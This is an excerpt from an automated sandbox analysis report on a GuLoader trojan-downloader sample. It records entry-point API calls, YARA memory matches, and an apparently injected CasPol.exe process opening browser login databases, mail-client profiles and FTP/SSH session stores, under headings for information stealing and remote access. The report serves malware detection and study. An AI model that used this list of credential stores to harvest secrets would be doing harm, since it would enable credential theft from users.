Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640

Stealing of Sensitive Information

Source: Yara match File source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match File source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR